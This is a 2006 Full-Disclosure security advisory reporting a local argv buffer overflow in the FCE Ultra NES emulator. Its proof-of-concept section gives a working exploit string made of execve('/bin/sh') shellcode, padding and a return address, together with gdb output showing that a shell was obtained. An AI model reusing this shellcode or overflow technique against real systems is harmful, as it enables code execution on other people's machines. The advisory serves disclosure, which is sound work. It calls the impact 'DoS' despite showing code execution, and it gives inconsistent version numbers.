=== FILE START === [xwings.net / security.net.my] Security Advisory : FCE Ultra buffer overflow, yet another local exploit without any fancy stuff. [xwings.net / security.net.my] Security Advisory 07 August 2006 BACKGROUND: =========== FCE Ultra is a NES (Nintendo Entertainment System) and Famicom (Family Computer) emulator for a variety of different platforms, based on Bero's FCE. Game compatibility is very high, provided you provide non-corrupt ROM/disk images. It has been tested (and runs) under DOS, Linux SVGAlib, Linux X, Mac OS X, and MS Windows. A native GUI is provided for the MS Windows port, and the other ports use a command-line based interface. However, GNOME users can optionally use the GNOME front-end. The SDL port should run on any modern UNIX-like operating system(such as FreeBSD) with no code changes. SOFTWARE: ========= FCE Ultra (fceu) <= 0.98.13 http://fceultra.sourceforge.net/ TESTED: ======= FreeBSD 6.1 Kubuntu 6.06 CRITICAL: ========= Very Low IMPACT: ======= DoS WHERE: ====== From Local DESCRIPTION: ============ Well ..... xwings@montana:[~]$ fceu Starting FCE Ultra 0.98.13... Usage is as follows: fceu filename Almost all the argv are exploitable. POC: ==== xwings@montana:[~]$ gdb -q fceu (no debugging symbols found)...(gdb) (gdb) r -fs `ruby -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 \ \x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";print "E" * 2029;print "\x28\xe4\xbf\xbf"'` Starting program: /usr/X11R6/bin/fceu -fs `ruby -e 'print "\x31\xc0\x50\x68\x2f \ \x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; \ print "E" * 2029;print "\x28\xe4\xbf\xbf"'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...warning: Unable to get location for thread creation breakpoint: generic error [New LWP 100164] (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found) ...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found) ...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found) ...(no debugging symbols found)... Starting FCE Ultra 0.98.13... [New Thread 0x820c000 (LWP 100164)] (no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...Loading 1?h//shh/bin??TSP??EEE .. (CUT) .. .. (CUT) .. .. (CUT) .. EEE(�.. $ uname -a FreeBSD montana.xwings.net 6.1-STABLE FreeBSD 6.1-STABLE #8: Mon Jul 31 14:14:12 MYT 2006 DETECTION: ========== [xwings.net / security.net.my] has confirmed this vulnerability on FCE Ultra 0.98.1 and below. All previous versions are suspected vulnerable to this issue. VI. VENDOR RESPONSE nothing at the moment VIII. DISCLOSURE TIMELINE 7th August 2006, Initial vendor notification IX. CREDIT Bug Founder : KaiJern, Lau Email : xwings xwings net Thanks to all the folks @ pulltheplug.org. == EOF === -- -- Regards, KaiJern, Lau == All good things ... come by grace, and grace come by art, and art does not come easy. ** From : xwings @ xwings . net _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/